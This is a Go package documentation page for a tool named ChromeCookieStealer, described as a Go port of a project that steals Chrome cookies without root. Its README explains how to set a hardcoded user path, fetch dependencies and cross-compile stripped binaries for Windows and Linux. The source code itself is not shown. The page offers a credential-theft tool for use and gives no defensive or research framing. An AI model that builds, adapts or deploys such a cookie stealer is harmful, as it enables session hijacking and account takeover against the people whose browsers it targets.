ChromeCookieStealer

command
v0.0.0-...-e17f638 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Jun 3, 2022 License: MIT Imports: 6 Imported by: 0

README

Go version of this interesting project => https://github.com/defaultnamehere/cookie_crimes which steals chrome cookies without root.

Note:

You'll habe to modify line 13 parameter entitled ADDYOURUSERNAME to that of your hostname/username so that the path "exists"

Building:

Since we used a few libraries you'll have to preform the following

  • go get github.com/levigross/grequests
  • go get github.com/tidwall/gjson
  • go get golang.org/x/net/websocket

To build the application run the following:

go build -ldflags "-w -s" chromecookie.go

or build

  • env GOOS=windows GOARCH=386 go build -v chromecookie.go
  • env GOOS=linux GOARCH=amd64 go build -v chromecookie.go

Documentation

The Go Gopher

There is no documentation for this package.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL